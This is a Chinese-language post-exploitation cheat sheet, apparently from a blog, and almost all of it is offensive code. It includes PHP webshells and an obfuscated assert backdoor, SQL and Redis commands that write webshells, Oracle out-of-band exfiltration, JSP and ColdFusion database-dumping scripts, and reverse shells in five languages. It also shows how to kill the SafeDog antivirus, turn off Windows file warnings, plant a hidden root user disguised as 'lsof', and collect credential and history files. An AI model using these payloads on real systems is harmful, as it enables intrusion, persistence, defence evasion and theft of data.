PHP相关
1 2 3 4 5 6 7 8 9 10 11
| <?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?>
<?php include "$_GET['_']"; ?>
<?php assert($_POST["1"]);?>
<?php $url = "http://x.x.x.x/shell.txt"; $contents = file_get_contents($url); echo $contents; ?>
|
Mysql数据库
phpmyadmin爆路径
1
| http://url/phpMyAdmin/libraries/select_lang.lib.php
|
SQL语句导出shell:
1
| select "<?php eval($_POST['1']);?>" into outfile 'C:\www\shell.php';
|
Redis数据库
写shell:
1 2 3 4
| config set dir D:\www config set dbfilename shell.php set webshell "<?php eval($_POST[x]);?>" save
|
Oracle数据库
查数据库ip
1
| select sys_context('userenv','ip_address') from dual
|
通过外连回传数据
1
| SELECT UTL_HTTP.request('http://target.com/getdata?data='||TABLE_NAME) FROM USER_TABLES WHERE ROWNUM<=1
|
查询所有表
1
| SELECT * FROM ALL_TABLES
|
查询当前用户表
1
| select table_name from user_tables;
|
查询所有表按大小排序
1 2
| SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES order by NUM_ROWS desc select table_name,NUM_ROWS from user_tables order by NUM_ROWS desc
|
查询表前十条
1
| select * from users where rownum < 10
|
分页查询 2000000 到 4000000
1
| SELECT * FROM (SELECT e.*,ROWNUM rn FROM (select * from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000
|
查询当前编码
1
| select userenv('language') from dual;
|
命令行执行
1
| export NLS_LANG="american_america.AL32UTF8"
|
拖库脚本
JSP1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| <%@ page contentType="text/html;charset=UTF-8"%> <%@ page import="java.io.*,java.lang.*,java.sql.*"%> <% Class.forName("oracle.jdbc.driver.OracleDriver"); Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin"); File f = new File("/webapps/ROOT/css/t1.txt"); BufferedWriter bw = new BufferedWriter(new FileWriter(f)); Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); ResultSet rs=stmt.executeQuery("select * from member where rownum > 2000000"); ResultSetMetaData rsmd = rs.getMetaData(); int numberOfColumns = rsmd.getColumnCount(); for(int i=1;i<numberOfColumns+1;i++){ bw.write(rsmd.getColumnName(i)+","); } while (rs.next()){ for(int i=1;i<numberOfColumns+1;i++){ bw.write(rs.getString(i)+","); } bw.newLine(); bw.flush(); } out.print(rs); %>
|
JSP2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
| <%@ page contentType="text/html;charset=UTF-8"%> <%@ page import="java.io.*,java.lang.*,java.sql.*"%> <% Class.forName("oracle.jdbc.driver.OracleDriver"); Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password"); Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); String html=""; File file = new File("/tmp/data.txt"); BufferedReader br = new BufferedReader(new FileReader(file)); String line; while ((line = br.readLine()) != null) { html=html+"<h3>"+line+":</h3><table border=1><tr>"; ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100"); ResultSetMetaData rsmd = rs.getMetaData(); int numberOfColumns = rsmd.getColumnCount(); for(int i=1;i<numberOfColumns+1;i++){ html=html+"<th>"+rsmd.getColumnName(i)+"</th>"; } html+="</tr>"; while (rs.next()){ html+="<tr>"; for(int i=1;i<numberOfColumns+1;i++){ html=html+"<td>"+rs.getString(i)+"</td>"; } html+="</tr>"; } rs.close(); html+="<tr></table>"; } File f = new File("/tmp/info.css"); BufferedWriter bw = new BufferedWriter(new FileWriter(f)); bw.write(html); bw.close(); br.close(); stmt.close(); conn.close(); %>
|
ColdFusion
1 2 3 4 5 6 7 8 9 10 11 12 13
| <CFSET USERNAME="user"> <CFSET PASSWORD="pass"> <CFSET DATABASE="ya_db"> <CFTRY> <CFQUERY NAME="DATA" DATASOURCE=#DATABASE# USERNAME=#USERNAME# PASSWORD=#PASSWORD#> SELECT * FROM MEMBER </CFQUERY> <CFCATCH Type="Any"></CFCATCH> </CFTRY> <CFSAVECONTENT variable="Dump_DATA"> <CFDUMP var="#DATA#" EXPAND="YES" FORMAT="TEXT"> </CFSAVECONTENT> <cffile action="write" output="#Dump_DATA#" FILE="C:\\RECYCLER\\#USERNAME#_DATA.txt">
|
反弹shell
bash
1
| bash -i >& /dev/tcp/1.1.1.1/1234 0>&1
|
1
| rm -f /tmp/p; mknod /tmp/p p && telnet 1.1.1.1 1234 0/tmp/p
|
ruby
1
| ruby -rsocket -e'f=TCPSocket.open("1.1.1.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
perl
1 2 3 4
| perl -e 'use Socket;$i="1.1.1.1"; $p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
python
1 2 3 4 5 6 7
| python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("1.1.1.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
|
php
1
| php -r '$sock=fsockopen("1.1.1.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
Windows取消共享文件夹安全警告
1 2
| @echo off Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f
|
kill安全狗3.x
1
| ntsd -c q -pn SafeDogGuardCenter.exe
|
其他
python Simple HTTP服务:
1
| python -m SimpleHTTPServer
|
Linux相关技巧
压缩目录
1 2 3
| zip -r root.zip /root/* tar -czvf root.tar.gz /root/ tar -cvf user/tmp/ooouser.tar user/ --exclude=image --exclude= --exclude *.jpg --exclude *.gif --exclude *.zip --exclude *.bmp --exclude *.eps --exclude *.psd
|
添加用户并设置密码
1
| useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof
|
收集所有.sh .pl .py .conf .cnf .ini .*history .pass (/usr/share目录里面的除外) 并打包成zip
1
| find / \! -path “/usr/share/*” -regex “.*\.sh$\|.*\.pl$\|.*\.py$\|.*\.conf$\|.*\.cnf$\|.*\.ini$\|.*\/\..*history$\|.*\/\..*pass.*” -print|zip pack.zip -@
|
array_push 后门
1
| array_map("ass\x65rt",(array)$_REQUEST['array']);
|